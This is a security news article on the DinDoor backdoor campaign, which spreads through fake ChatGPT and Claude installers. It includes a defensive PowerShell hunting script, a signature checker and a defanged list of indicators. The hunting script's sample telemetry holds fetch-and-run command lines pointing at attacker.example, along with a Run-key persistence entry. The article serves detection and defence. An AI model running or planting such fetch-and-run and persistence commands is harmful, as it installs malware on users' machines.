
Hackers Use Fake ChatGPT and Claude Installers to Deploy DinDoor Backdoor

May 28, 2026 · 5 min read

A new malware campaign is targeting content creators, gamers, and AI enthusiasts by disguising itself as popular software tools like ChatGPT and Claude.

The attackers are spreading a dangerous backdoor called DinDoor through fake installers hosted on trusted platforms, catching many users completely off guard.

The campaign has gained significant traction, partly because it uses compromised YouTube channels to push traffic toward the malicious files.

Videos on these channels have already accumulated more than 50,000 views, making this a far-reaching threat that extends well beyond a small handful of victims.

Researchers at Malwarebytes identified the campaign after spotting suspicious fake installers and plugins on GitHub and SourceForge.

The researchers noted that the malware impersonates well-known software brands including ChatGPT, Claude, Ableton Live, AutoTune, and Kontakt, making the deception particularly convincing for users who trust these names.

The attackers rely heavily on the credibility of legitimate platforms to make their fake projects look real.

Since GitHub and SourceForge are trusted by millions of developers and everyday users, victims are far less likely to question the authenticity of what they are downloading.

Compromised YouTube channels with AI-generated videos (Source: Malwarebytes)

Malwarebytes said in a report shared with Cyber Security News (CSN) that once installed, DinDoor acts as a backdoor that connects to a command-and-control server and delivers a fully capable remote access Trojan, or RAT.

This RAT can steal data from browsers and crypto wallets, capture screenshots, record clipboard activity, and even stream live video of the victim's screen through a hidden Microsoft Edge process, using the trusted browser as cover.

How the DinDoor Backdoor Infects Victims

The infection begins when a user visits a malicious GitHub or SourceForge repository and pastes the "installation" command it provides into a terminal, believing they are installing legitimate software.

That single command silently downloads an MSI package from an attacker-controlled site and runs it with msiexec, Windows' built-in installer, kicking off the entire chain. The MSI then drops a CMD file and a PowerShell script onto the victim's machine.

YouTube posts linking to the malicious GitHub repositories (Source: Malwarebytes)

The PowerShell script installs the Deno JavaScript runtime through the package managers Scoop and WinGet (WinGet ships with current Windows; Scoop is a widely used third-party manager), so the install looks like routine developer tooling rather than malware staging. Once Deno is in place, the script uses it to fetch and run the DinDoor backdoor directly from the attacker's server. Because Deno can execute a script straight from a URL, the backdoor arrives as JavaScript/TypeScript rather than as a conventional malware executable.

DinDoor then establishes persistence by creating a registry Run key entry, so the malware is relaunched each time the user logs on.

The backdoor quietly communicates with the C2 server, pulling down additional payloads and sending back information about the compromised system.
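The four-step chain above (msiexec pulling a package from a URL, Scoop or WinGet installing Deno, Deno running a script from a URL, and a Run key pointing at deno.exe) is unusual enough on a single host to hunt for. The PowerShell below is an added example, not code from Malwarebytes or the article: it scores Sysmon-style process-creation (Event ID 1) and registry value-set (Event ID 13) records against those stages and flags hosts where two or more stages line up. The sample events are constructed, and the host names, user paths and attacker.example URL are assumptions.

```powershell
# Added example (not from the article or Malwarebytes): hunt for the DinDoor
# delivery chain in Sysmon-style telemetry. Field names follow Sysmon Event ID 1
# (Image, CommandLine) and Event ID 13 (TargetObject, Details).

function Find-DinDoorChain {
    param([Parameter(Mandatory)][object[]]$Events)

    $hits = [System.Collections.Generic.List[object]]::new()
    foreach ($e in $Events) {
        $cmd      = [string]$e.CommandLine
        $stage    = $null
        $evidence = $cmd
        switch ([int]$e.EventId) {
            1 {
                # Stage 1: the pasted one-liner hands msiexec a package URL instead of a local file
                if ($e.Image -match '(?i)\\msiexec\.exe$' -and $cmd -match '(?i)(^|\s)/(i|package)\s+"?https?://') {
                    $stage = 'msi-from-url'
                }
                # Stage 2: Scoop or WinGet installing the Deno runtime (legitimate tool, suspicious context)
                elseif ($cmd -match '(?i)\b(scoop|winget)(\.exe)?\b.*\binstall\b.*\bdeno\b') {
                    $stage = 'deno-install'
                }
                # Stage 3: Deno executing a script fetched straight from a web server
                elseif ($e.Image -match '(?i)\\deno\.exe$' -and $cmd -match '(?i)\brun\b.*https?://') {
                    $stage = 'deno-remote-run'
                }
            }
            13 {
                # Stage 4: a Run value whose command launches deno.exe at every logon
                if ($e.TargetObject -match '(?i)\\CurrentVersion\\Run\\' -and [string]$e.Details -match '(?i)\bdeno(\.exe)?\b') {
                    $stage    = 'run-key-deno'
                    $evidence = "$($e.TargetObject) = $($e.Details)"
                }
            }
        }
        if ($stage) {
            $hits.Add([pscustomobject]@{ Host = $e.Host; Stage = $stage; Evidence = $evidence })
        }
    }
    return $hits
}

function Get-DinDoorVerdict {
    param([Parameter(Mandatory)][object[]]$Events)
    $hits = Find-DinDoorChain -Events $Events
    foreach ($group in @($hits | Group-Object -Property Host)) {
        $stages  = @($group.Group.Stage | Sort-Object -Unique)
        # One stage alone (a developer installing Deno, an admin deploying an MSI) is noise;
        # two or more distinct stages on the same host is the chain the article describes.
        $verdict = if ($stages.Count -ge 2) { 'LIKELY-DINDOOR' } else { 'REVIEW' }
        [pscustomobject]@{
            Host     = $group.Name
            Stages   = ($stages -join ', ')
            Verdict  = $verdict
            Evidence = ($group.Group.Evidence -join ' | ')
        }
    }
}

# Constructed sample telemetry (not real logs): one infected creator workstation and
# one developer machine that merely installed Deno on purpose. URLs/paths are assumptions.
$sample = @(
    [pscustomobject]@{ EventId = 1; Host = 'WS-CREATOR01'; Image = 'C:\Windows\System32\msiexec.exe'
                       CommandLine = 'msiexec /i https://attacker.example/ChatGPT-Setup.msi /qn' }
    [pscustomobject]@{ EventId = 1; Host = 'WS-CREATOR01'; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell -ep bypass -c "scoop install deno"' }
    [pscustomobject]@{ EventId = 1; Host = 'WS-CREATOR01'; Image = 'C:\Users\alice\scoop\apps\deno\current\deno.exe'
                       CommandLine = 'deno run -A https://attacker.example/dindoor.js' }
    [pscustomobject]@{ EventId = 13; Host = 'WS-CREATOR01'
                       TargetObject = 'HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\EdgeUpdater'
                       Details = 'C:\Users\alice\scoop\apps\deno\current\deno.exe run -A https://attacker.example/dindoor.js' }
    [pscustomobject]@{ EventId = 1; Host = 'DEV-BOX07'; Image = 'C:\Users\bob\AppData\Local\Microsoft\WindowsApps\winget.exe'
                       CommandLine = 'winget install DenoLand.Deno' }
    [pscustomobject]@{ EventId = 1; Host = 'DEV-BOX07'; Image = 'C:\Windows\System32\msiexec.exe'
                       CommandLine = 'msiexec /i C:\Users\bob\Downloads\VSCodeSetup.msi /qn' }
)

# WS-CREATOR01 collects all four stages (LIKELY-DINDOOR); DEV-BOX07 only the Deno install (REVIEW).
Get-DinDoorVerdict -Events $sample | Format-List
```

Feed it real events by mapping Get-WinEvent output from the Microsoft-Windows-Sysmon/Operational log onto the same property names. The stage regexes are deliberately broad (any remote MSI, any Deno-from-URL), which is why the verdict requires correlation across stages rather than treating a single hit as malicious.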

The same backdoor was also distributed through SourceForge pages mimicking a game booster called GearUP and an AI watermark remover called BWR, showing that the attackers are not limiting themselves to AI chatbot lures alone.

The Deno RAT and Its Hidden Capabilities

The RAT delivered through DinDoor is built on the same Deno JavaScript runtime and carries an extensive set of spying and data theft tools.

It targets over 50 crypto wallet browser extensions and software wallets including Atomic Wallet, Exodus, and Electrum, posing a direct financial risk to anyone in the crypto space.

One of its most unusual features is a peer-to-peer video streaming mode that hijacks the Microsoft Edge browser.

GitHub repository for fake ChatGPT installer (Source: Malwarebytes)

The RAT silently launches a hidden Edge process, injects a small web page into it, and uses that page to stream live video of the victim's screen to the attacker over a peer-to-peer connection. Because the traffic originates from a legitimate, signed browser process and never passes through a central relay, it is far harder to spot with network monitoring that keys on known C2 infrastructure.

The RAT also supports SOCKS5 proxy tunnels, full remote desktop control via a custom VNC setup, and can execute commands using PowerShell.

A lighter version of the RAT called “agent-lite” was also found, which routes its communications through Cloudflare Workers for even greater anonymity.

Users are strongly advised to download software only from official vendor websites and to be wary of free or cracked versions of paid tools. Any installation guide that tells you to paste a command into a terminal, especially one that downloads and runs an MSI from a URL, should be treated as a warning sign in itself.

Before running any downloaded file, check its publisher and digital signature (right-click the file, open Properties, and look at the Digital Signatures tab). It is a simple but effective first step: an unsigned installer for a commercial product, or one signed by a name that does not match the vendor, should not be run.
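The same check can be scripted so it is done every time rather than only when someone remembers. The function below is an added example, not from the article: it uses the built-in Get-AuthenticodeSignature cmdlet (which handles .exe, .msi and .ps1 files) and only accepts a file whose signature is valid and whose signer matches a publisher you named in advance. The publisher patterns and the download path are assumptions; copy the exact Subject string from a known-good installer of the product you actually use.

```powershell
# Added example (not from the article): verify a downloaded installer's Authenticode
# signature and its signer before running it. $ExpectedPublisher is an assumption
# you fill from a genuine installer's certificate Subject.

function Test-InstallerSignature {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string[]]$ExpectedPublisher   # substrings of the expected Subject, e.g. 'O=Some Vendor'
    )
    $sig  = Get-AuthenticodeSignature -FilePath $Path
    $hash = (Get-FileHash -Path $Path -Algorithm SHA256).Hash
    $out  = [ordered]@{ Path = $Path; Sha256 = $hash; Status = $sig.Status; Signer = $null; Verdict = 'REJECT'; Reason = $null }

    # Status covers the whole chain: NotSigned, HashMismatch (file altered after signing)
    # and NotTrusted (untrusted or revoked issuer) all fail here.
    if ($sig.Status -ne 'Valid') {
        $out.Reason = "signature status is $($sig.Status); do not run"
        return [pscustomobject]$out
    }
    $out.Signer = $sig.SignerCertificate.Subject

    # A valid signature only proves who signed the file. Criminals buy or steal
    # code-signing certificates, so the signer must also be the publisher you expected.
    $matched = $ExpectedPublisher | Where-Object { $out.Signer -like "*$_*" }
    if ($matched) {
        $out.Verdict = 'ACCEPT'
        $out.Reason  = 'valid signature from an expected publisher'
    } else {
        $out.Reason  = 'validly signed, but by a publisher you did not expect'
    }
    [pscustomobject]$out
}

# Usage (path and publisher are placeholders): run before double-clicking anything from a download page.
$candidate = "$env:USERPROFILE\Downloads\ChatGPT-Setup.msi"
if (Test-Path $candidate) {
    Test-InstallerSignature -Path $candidate -ExpectedPublisher 'O=OpenAI' | Format-List
}
```

Keep the SHA-256 from the output: if the vendor publishes hashes, compare against them, and if the file turns out to be malicious the hash is the indicator you will want to search for elsewhere.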

Indicators of Compromise (IoCs):

Type       | Indicator                                              | Description
-----------|--------------------------------------------------------|--------------------------------------------------------------
URL        | https[:]//github.com/claude-free-plugin/               | Malicious GitHub repository distributing fake Claude installer
URL        | https[:]//github.com/ai-gen-profi                      | Malicious GitHub repository for fake AI software
URL        | https[:]//github.com/wharfdemolisherpit                | Malicious GitHub repository for fake software
URL        | https[:]//sourceforge.net/projects/gearup/             | Fake GearUP game booster on SourceForge
URL        | https[:]//sourceforge.net/projects/bluewaveremover/    | Fake BWR AI watermark remover on SourceForge
Domain     | claudescript[.]top                                     | Distribution website for DinDoor malware
Domain     | ms-telemetry-gateway-us[.]com                          | Command-and-control (C2) server
Domain     | dakatawebstick[.]com                                   | Command-and-control (C2) server
Domain     | ashpaltlonpro[.]com                                    | Command-and-control (C2) server
Domain     | cf-proxy[.]cloud-analytics-services[.]workers[.]dev    | Cloudflare Workers-based C2 server
Domain     | agilemast3r[.]duckdns[.]org                            | Command-and-control (C2) server
Domain     | geralnewlong[.]com                                     | Command-and-control (C2) server
Domain     | hngfbgfbfb[.]cyou                                      | Command-and-control (C2) server
Domain     | logicalnewrestore[.]com                                | Command-and-control (C2) server
IP Address | 23[.]227[.]196[.]107                                   | Command-and-control (C2) server
IP Address | 45[.]137[.]99[.]121                                    | Command-and-control (C2) server
IP Address | 31[.]57[.]129[.]23                                     | Command-and-control (C2) server
IP Address | 66[.]78[.]40[.]107                                     | Command-and-control (C2) server
IP Address | 193[.]233[.]198[.]132                                  | Command-and-control (C2) server

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Source: CybersecurityNews.com
